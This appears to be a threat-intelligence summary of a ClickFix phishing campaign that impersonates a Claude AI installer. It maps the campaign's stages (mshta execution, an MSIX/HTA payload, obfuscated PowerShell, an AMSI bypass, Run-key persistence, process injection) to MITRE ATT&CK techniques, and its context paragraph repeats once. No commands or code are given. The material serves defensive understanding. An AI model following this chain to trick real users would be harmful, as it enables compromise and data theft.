Context:
The ClickFix phishing campaign leverages social engineering by impersonating a legitimate Claude AI installer to trick users into executing malicious commands. Instead of relying on traditional malware delivery, the attack uses user-assisted execution, instructing victims to run commands via the Windows Run utility, often invoking mshta with a crafted URL. This leads to the download of a malicious MSIX bundle containing an HTA file, which builds an obfuscated PowerShell stage, bypasses AMSI, and retrieves additional payloads from attacker-controlled infrastructure. The final stage includes execution techniques such as process injection using encrypted shellcode.
By combining trusted branding with the ClickFix technique, the campaign increases the likelihood of successful compromise while evading conventional security controls.
Mitre ATT&CK Mapping
| Tactic |
Technique ID |
Technique Name |
Context |
| Initial Access |
T1566.002 |
Phishing: Spearphishing Link |
Victim clicks a malicious link leading to a phishing page impersonating a Claude AI installer. |
| Execution |
T1218.005 |
System Binary Proxy Execution: Mshta |
Mshta is launched with a crafted URL to retrieve and execute a remote MSIX payload. |
| Command and Control |
T1105 |
Ingress Tool Transfer |
A malicious MSIX bundle is downloaded from attacker-controlled infrastructure. |
| Execution |
T1218 |
System Binary Proxy Execution |
The MSIX package executes an embedded HTA file using trusted Windows components. |
| Defense Evasion |
T1027.010 |
Obfuscated/Compressed Files: Command Obfuscation |
The HTA script contains obfuscated commands designed to evade detection. |
| Defense Evasion |
T1140 |
Deobfuscate/Decode Files or Information |
The HTA script decodes and reconstructs the obfuscated malicious content at runtime. |
| Persistence |
T1547.001 |
Registry Run Keys / Startup Folder |
A registry Run key is created to establish persistence on the system. |
| Execution |
T1059.001 |
Command and Scripting Interpreter: PowerShell |
The HTA script generates and executes an encoded PowerShell command. |
| Execution |
T1059.001 |
Command and Scripting Interpreter: PowerShell |
PowerShell computes a host-based identifier and retrieves the next-stage payload. |
| Defense Evasion |
T1562.001 |
Impair Defenses: Disable or Modify Tools |
AMSI protections are bypassed to allow execution of malicious PowerShell code. |
| Execution |
T1059.001 |
Command and Scripting Interpreter: PowerShell |
The final PowerShell stage decodes payload data and prepares it for execution. |
| Execution |
T1055 |
Process Injection |
The final payload is injected into a legitimate process using native Windows APIs. |
References
https://www.rapid7.com/blog/post/ve-clickfix-phishing-campaign-fake-claude-installer/
https://socprime.com/active-threats/clickfix-phishing-campaign-disguised-as-a-claude-installer/
Context:
The ClickFix phishing campaign leverages social engineering by impersonating a legitimate Claude AI installer to trick users into executing malicious commands. Instead of relying on traditional malware delivery, the attack uses user-assisted execution, instructing victims to run commands via the Windows Run utility, often invoking mshta with a crafted URL. This leads to the download of a malicious MSIX bundle containing an HTA file, which builds an obfuscated PowerShell stage, bypasses AMSI, and retrieves additional payloads from attacker-controlled infrastructure. The final stage includes execution techniques such as process injection using encrypted shellcode.
By combining trusted branding with the ClickFix technique, the campaign increases the likelihood of successful compromise while evading conventional security controls.
Mitre ATT&CK Mapping
References
https://www.rapid7.com/blog/post/ve-clickfix-phishing-campaign-fake-claude-installer/
https://socprime.com/active-threats/clickfix-phishing-campaign-disguised-as-a-claude-installer/